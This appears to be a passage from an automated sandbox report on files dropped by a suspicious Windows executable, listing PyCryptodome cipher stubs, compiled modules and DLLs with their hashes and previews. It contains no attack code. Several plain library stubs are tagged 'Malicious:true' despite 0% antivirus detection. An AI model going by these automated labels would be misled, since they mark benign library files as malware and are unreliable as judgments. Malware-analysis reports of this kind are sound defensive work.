                                                                                                                                            Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\Blowfish.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1056
                                                                                                                                            Entropy (8bit):4.93319559592513
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+7vEStrF+olDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+DtrF+wJqJejbFoev
                                                                                                                                            MD5:ADC4E67BDA4767C9F270DD32CCECC085
                                                                                                                                            SHA1:69FE8AABD602E03066EE627CFD0185486383A618
                                                                                                                                            SHA-256:C108D97BABEE0989438F29A01B0B0B95AE54118434A49AE832FD0EB2310FB73F
                                                                                                                                            SHA-512:C613BA321D3F8D0C41BE9DE652A47839C2059F9BF53F1FAA9E5967193D1898EAFF394857D6EAB4E0AA24E2159733BC304AACE3A94DBF6CD2B200EBA8712477D2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgp

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\CAST.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1021
                                                                                                                                            Entropy (8bit):4.948780176242253
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+TivieL/tixsDOIosswDNqDNMN3zb1DoeZ:K+1+O+O+s+8+s+w+TQieL/tixsDOIYwr
                                                                                                                                            MD5:DF4E506EF652F92CD4F1C01C3E91C3E0
                                                                                                                                            SHA1:49625B957B302755062BFEF1FD00A1C88F378C79
                                                                                                                                            SHA-256:A017C351D0BF5AEFC610A60EE41B968BC5C1FA5E78B9FA593FE3C9C278CE9550
                                                                                                                                            SHA-512:9B85DFA5B47C60337AEE04D48AF64FE2B5F03152498DE4C340B0A4C170262D0C5BE8549787AA0093592E2308A41AE88A725E8C2D6B340E3B6EB8B2803C0328D2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ChaCha20.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):798
                                                                                                                                            Entropy (8bit):4.852768717173627
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                            MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                            SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                            SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                            SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ChaCha20_Poly1305.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1107
                                                                                                                                            Entropy (8bit):4.862920256864568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                            MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                            SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                            SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                            SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\DES.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1001
                                                                                                                                            Entropy (8bit):4.909258900429456
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+Aiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHT:K+1+O+O+s+8+s+w+H7XY6JqJejbFoeRz
                                                                                                                                            MD5:1EA64CB2FDD42F20112DF249B9A7CB87
                                                                                                                                            SHA1:633110F4D03C3EDF415640989802108EC2764422
                                                                                                                                            SHA-256:98BBDA18A15E4757AB66CC049EADA7FE944FF2D1093EE70F643D634CAF296E7E
                                                                                                                                            SHA-512:2845EBEC10C8250A0B4C7D0AB87245CF91D07D0F0973B0289516F94494D5698E17A9709D1B411B04908F02FC83B0922F0AEDEADF7901106184EA247729DAADF8
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size: int.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\DES3.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1073
                                                                                                                                            Entropy (8bit):4.981416466224206
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENbKAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+4NINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1+O+O+s+8+s+w+4GxOkDRJqJejbFo7
                                                                                                                                            MD5:4E6C49F8750DD064B28D3138434CC5F3
                                                                                                                                            SHA1:121984851A159ED24D11E4E79DF4B0B4BCF6AE63
                                                                                                                                            SHA-256:9005CB3F60F682B7840F7112D940128AE8EA1777DAC8C1F3A4B8F0E17F6A398B
                                                                                                                                            SHA-512:E21FC0A0B2D2CCD167CC2B9B0B9DE66771B11AF4CF2D9510F53E029D1CC43407A03B2866C000E6E31975C73B9457BB3CB99317E8FC51D276B84C93E9CC6CBEB3
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, C

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\PKCS1_OAEP.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1214
                                                                                                                                            Entropy (8bit):4.8233945885346685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjQFC19+1bs1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFy+1o1IttDLteMI5aoJupVjHo
                                                                                                                                            MD5:A065FCD801FD38FDC5457C65A8B94801
                                                                                                                                            SHA1:7C353866EA0CFC0E55A90530714758115424B723
                                                                                                                                            SHA-256:DFEAE2746DEFD28744873401D008462C4C1EF4899B7BAFAEAE14FCA12A5BB73E
                                                                                                                                            SHA-512:959C65295EA6C93D67E7C1E5361A03C09CB7A37C7C64A92334A0C612952C3609708766780C99BD93DD5A9C23D79B7A3CF0C0614D083A13F3F9A8D5DBC3E6C7A2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlgo: O

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\PKCS1_v1_5.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):706
                                                                                                                                            Entropy (8bit):4.785885591583499
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1mmN+1bgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEt:1REq7+1bspT3ENIAlUH8Myje+wqKozuP
                                                                                                                                            MD5:48B6BF106FC448220A97A73FBFA2425F
                                                                                                                                            SHA1:9899751126284AEC60B7D2C28047A93063B9CB20
                                                                                                                                            SHA-256:219BE400169E585320C518A50540EDA12E3C4F489322C42D56FDAD283D07A021
                                                                                                                                            SHA-512:D05EF3D93B5460A172FC3AB0E21B256CA3CE7BA3C7569E8074E01FDA2A7A309F63EEA6D7FB17D501DC77EC639C963B6D07A0EB0094A6DBF6C4645A30FB46D36E
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Crypto.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\Salsa20.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):770
                                                                                                                                            Entropy (8bit):4.753367031924495
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                            MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                            SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                            SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                            SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_ARC4.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11264
                                                                                                                                            Entropy (8bit):4.703513333396807
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                                                                                                            MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                                                                                                            SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                                                                                                            SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                                                                                                            SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_EKSBlowfish.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4822
                                                                                                                                            Entropy (8bit):5.292220729270199
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:bawqXvaWWWa+aj9iivDDMq1sNp91+7moVH4y2S:bactjV3oN/1+7mQ/
                                                                                                                                            MD5:40FC9EA391140E569771CA1620CF30E3
                                                                                                                                            SHA1:001BDC9A6D90C20BB8AB21B35AE1AE3C330D82F0
                                                                                                                                            SHA-256:F387FB5BFB82878BC35AAD7CC72C73E5ED85551F6F52B5617C4A97B962B96A7B
                                                                                                                                            SHA-512:A20088AE9B51E6CB3E986F6163FB48E2D0E4D29E7E082698933BDD4A9C59B8900BA54016F37A914E690EF60DA0C7DEB02623A84364AC757C42B4A09C3123CF18
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................~.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z.d...Z.d...Z.d.Z.d.Z...e.d.d...............Z.d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_uintz.Crypto.Cipher._raw_eksblowfishaa.... int EKSBlowfish_start_operation(const uint8_t key[],. size_t key_len,. const uint8_t salt[16],. size_t salt_len,. unsigned cost,. unsigned invert,. void **pResult);. int EKSBlowfish_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int EKSBlowfish_decrypt(const void *state,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_EKSBlowfish.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):281
                                                                                                                                            Entropy (8bit):4.919666506917015
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBNHK+kb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQ+kzlbgHvIY3YyogmvNZRy/O
                                                                                                                                            MD5:4030500BC383DEE6F4BBDF228147813E
                                                                                                                                            SHA1:DE9B1C78DD481B3B42A29AB5485C2C1B3EDFF182
                                                                                                                                            SHA-256:4917140D2EAE01669B206BEAB2164796D2DF836CFBD8ACCC9189CF4E6EEBEDB2
                                                                                                                                            SHA-512:FCAE9156019C79B2033E53F4F0626FD729F8B99F6EB73C837330D5AE079F19CCBA33A7EB2C72CC3055C365B2ED272AFCD7313310A9C2F1120EA16FF0E7AFF63A
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Iterable....from Crypto.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_chacha20.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.061461040216793
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                                                                                                            MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                                                                                                            SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                                                                                                            SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                                                                                                            SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_cbc.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10506
                                                                                                                                            Entropy (8bit):5.3104246753396716
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:K226kvwbQ9XIgEggPI4nx3ZJpSSmRWiHgVt834mGvWcsQAn9rdLt83425pKIn+1Y:KabJsgPI4x3ZAWdU4c7U4QnKejRgVA
                                                                                                                                            MD5:8D3F55D6E79437B30ECA3C04F33EF552
                                                                                                                                            SHA1:D6A077A82B9D536F5C919270B760413B194BF540
                                                                                                                                            SHA-256:9E6DF51261AE72720DEAC882FF602A9D4671EBE7C0874F364225583FC7003220
                                                                                                                                            SHA-512:8ADFFB272F5FA333D0AAFE49F7314AF08346D02CB1AF09595DA1AB228A698B819E39901F929E13CECBD2280110D41C300399C88BDAEDA1BE6D7D091267DF45BA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.+.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_cbc.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):712
                                                                                                                                            Entropy (8bit):4.750220080456401
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                            MD5:30DD017C0985A1EFF693D631609C1DB6
                                                                                                                                            SHA1:378924C68A2872C951B6AB0291014CD3DD3C3B9C
                                                                                                                                            SHA-256:BCD20F1E0C545F56F186640614FEB8B125A2627F7A56F36DA2A3B2040EFE6FFC
